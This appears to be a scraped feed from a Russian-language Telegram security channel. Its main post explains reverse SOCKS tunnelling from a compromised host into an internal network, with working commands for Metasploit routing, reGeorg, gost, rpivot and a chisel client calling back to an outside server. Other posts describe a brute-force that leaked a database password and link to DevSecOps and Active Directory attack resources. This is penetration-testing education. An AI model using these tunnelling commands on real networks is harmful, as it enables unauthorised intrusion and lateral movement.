#Beacon
1.18K subscribers
271 photos
26 videos
130 files
1.83K links
Прожаренный цуберпохек

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
Download Telegram
Forwarded from RedTeam brazzers
Существует много способов построить reverse socks туннель. Давайте рассмотрим 3 самых простых.
- Meterpreter
Строим сессию meterpreter (пусть она будет под номером 1).
Далее запускаем socks сервер use auxiliary/server/socks_proxy и прописываем route в сессию метерпретер:
route add 192.168.0.0 255.255.0.0 1
Всё, теперь залетая в 127.0.0.1:1080 мы вылетим во внутренней сети(proxychains или tsocks кому как удобнее).
Возможно кто нибудь из олдов скажет, что этот способ плохой и будь мы в 2020 году - я бы согласился, тогда модуль назывался auxiliary/server/socks4a и работал он из рук вон плохо, но времена меняются.
- reGeorg
Используем инструмент https://github.com/sensepost/reGeorg. Если вы проломили сервер в DMZ, то скорее всего там есть PHP, ASP или JSP приложение. Стоит загрузить соответствующий файл на сервер, запустить у себя клиент - и вот мы через HTTP туннель вылетаем во внутреннюю сеть.
- Gost
Способ которым пользуюсь я сам. Невероятно мощный инструмент https://github.com/ginuerzh/gost, на узле В запускаем gost в интернете:
gost -L socks5://user:pass@0.0.0.0:1337
На узле А запускаем 2 госта:
./gost -L socks5://user:pass@127.0.0.1:13338&
./gost -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://user:pass@<ip B>:1337&
всё, теперь подключаемся к порту 13381 на узле D и выходим в DMZ. Как бонус мы установили логин/пароль на socks и повесили порт на сервере B в Интернет.
Инструмент gost очень надёжный и построив один раз туннель можете не переживать, он и через месяц будет работать, как говорится "без единого разрыва!".
Есть и другие инструменты, в том числе и встроенные, например, ssh. Первым шагом на сервер B пробрасываем 22 порт, а потом на сервере B подключаемся в него с опцией -D, но этот способ может быть не всегда удобен.

Есть прекрасная статья https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6 которая вам подробнее расскажет про магию SSH.
Еще есть вариант с помощью инструмента Rpivot(https://github.com/klsecservices/rpivot):
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0

Client side:

python client.py --server-ip <ip> --server-port 9999

As a result, a socks4 proxy service will be bound server side on port 1080.

Еще вариант от уважаемого гостя нашего канала (@snovvcrash)
Используя chisel:

(B) $ ./chisel server -p 1337 --reverse --socks5 --auth hax0r:'Passw0rd!'
(A) $ nohup ./chisel client --fingerprint <FINGERPRINT> --auth hax0r:'Passw0rd!' 8.8.8.8:1337 R:127.0.0.1:1080:socks &
(B) $ proxychains4 -q hacktheplanet.py 10.10.13.37

где 10.10.13.37 - какая-нибудь тачка из внутренней сети
Верно ответили на вопрос:
@Lizzmack
@heart1ess
@drakylar
@snovvcrash
#вопросответ
Искал медь, а нашёл золото

Решил проверить наличие защиты от перебора кода при восстановлении доступа к аккаунту. Код восстановления состоял из 4 символов. Взял фаззер, по умолчанию выставил 50 одновременных потоков, запустил перебор и не обнаружил никаких rate limit'еров. Время жизни кода было небольшим - всего 60 секунд, а ответ от сервера занимал несколько секунд. При таких условиях времени перебрать все возможные варианты попросту не хватило бы

Выставил 1000 потоков и... забил все доступные слоты для подключения к БД 😬
В результате сервер в теле ответа вернул детали ошибки. В одной из строчек присутствовал пароль от БД в открытом виде 😎

И такое бывает 😁
Начинаем серию статей по DevOps и DevSecOps, где поделимся интересными идеями о DevOps в общем, рассмотрим инструменты, облегчающие процесс разработки кода. Но особое внимание уделим DevSecOps и особенностям обеспечения безопасности в разработке.👨‍💻

Основы😄:

-Зачем вообще внедрять девопс если все это дорого богато, а штрафы за утечки в РФ стоят копейки(там не сильно интересно, но в целом базу зачем надо описывают)
https://youtube.com/watch?v=ywu7osKVZIw&feature=youtu.be

- Позитивы на стендофе, от лозунгов к реализации devsecops
https://youtu.be/BF24NoqU5ZI?si=sEK1JW5lGHLU7W5m

- Мифический человеко-DevOps
https://habr.com/ru/articles/786854/

- Некоторые техники безопасной разработки https://www.chaossearch.io/blog/advanced-devsecops-techniques-audit-logging

- Строим devsecops pipeline на опенсурс инструментах
https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c

- Архитектура цикла безопасной разработки здорового человека от microsoft https://learn.microsoft.com/ru-ru/azure/architecture/solution-ideas/articles/devsecops-rolling-branch

- Advanced End-to-End DevSecOps Kubernetes(может понадобиться впн, т.к. medium) https://blog.stackademic.com/advanced-end-to-end-devsecops-kubernetes-three-tier-project-using-aws-eks-argocd-prometheus-fbbfdb956d1a

- Инструменты devsecops, постоянно пополяемый список различных инструментов, заглядываю туда когда надо подобрать нужный инструмент
https://github.com/sottlmarek/DevSecOps

Как все происходит, если не соблюдать🤒:
- Как через Github крупные компании ломают, основные приемы https://securitymedia.org/info/opasnye-svyazi-kak-prestupniki-vzlamyvayut-it-produkty-cherez-github.html

- Почему Rockstar Games и Uber взломаны несмотря на девопс https://www.informationweek.com/software-services/is-it-time-to-rethink-devsecops-after-major-security-breaches-

Интересные канальчики🤠:
https://t.me/devsecops_weekly
https://devops.com/category/blogs/devsecops/

Постинг по данной теме можно будет найти по хештегу
#devsecops

Список будет постоянно пополняться
👍1
Кстати довольно таки интересный курс по похеку(взлому) active directory, там все основы, также в конце дают сертификат о прохождении лекций.
Несмотря на то что работодатели не ценят прохождение курсиков udemy - для галочки и знаний нормально

https://www.udemy.com/course/active-directory-exploitation-and-lateral-movement-black-box/

#Redteam
Forwarded from road to OSCP
Атаки на Active Directory без учетных данных

https://hadess.io/pwning-the-domain-credentialess-username/
Forwarded from road to OSCP
Сборник примеров уязвимого кода на разных языках и способы исправления

https://docs-dev.fluidattacks.com/dquinteroatfluid/criteria/fixes/
road to OSCP
Сборник примеров уязвимого кода на разных языках и способы исправления https://docs-dev.fluidattacks.com/dquinteroatfluid/criteria/fixes/
Довольно интересно, учитывая что я сейчас собираю уязвимые снипетты для создания sast под скан бизнес логики в сурс коде
Члена lockbit допрашивают, слив произошел
https://youtu.be/J-KP82SCRNs?si=s5o0YsEuJ56f8v_E
Парочка плохих шутеек от жпт(chat gpt) по поводу редтима, решил проверить чувство юмора у нейронки, как у нее получилось судите сами😅

1) Зачем хакеру из красной команды ломать Active Directory, если он может просто спросить пароль у администратора на корпоративной вечеринке?

Потому что на последней вечеринке админ использовал многофакторную аутентификацию: пиво, водка и текила. После этого, даже если хакер и получил бы пароль, вспомнить его уже было бы верхом привилегий!

2)Почему хакер из красной команды прекратил флиртовать с Active Directory?

Потому что когда он предложил зайти поглубже и использовать pass-the-hash, Active Directory ответила: "Ты что, серьёзно? Мне нужен надёжный партнёр, а ты всё время пытаешься перейти к DCSync без предварительных ласк в виде phishing! И да, я заметила, как ты косишься на мои GPOs, мечтая о lateral movement. Нам лучше остаться друзьями... с ограниченными правами!"

3) Хакер из красной команды заявляет на встрече: "Я решил перестать использовать сложные эксплойты для внедрения в сеть. Вместо этого, я начал отправлять IT-отделам письма с угрозами отключить интернет-чайник, если они сами не предоставят мне доступ. Вы не поверите, но эффективность почти 100% - кажется, без утреннего кофе они готовы на все!"
Forwarded from promin71
This media is not supported in your browser
VIEW IN TELEGRAM
❤‍🔥1🤡1
This media is not supported in your browser
VIEW IN TELEGRAM
Сегодня наше хакерское комьюнити хочет поздравить Вас, наших прекрасных женщин, с 8 марта! Пусть ваш код всегда будет эффективным, а ваши алгоритмы - безошибочными. Пусть ваша жизнь будет полна интересных задач и успешных проектов, а ваши планы - безопасны от вирусов. Пусть каждый бит вашего женского кода будет неповторимым и вдохновляющим для всех вокруг! С праздником вас, наши самые ценные ресурсы! 🌹❤️
4❤‍🔥1🤡1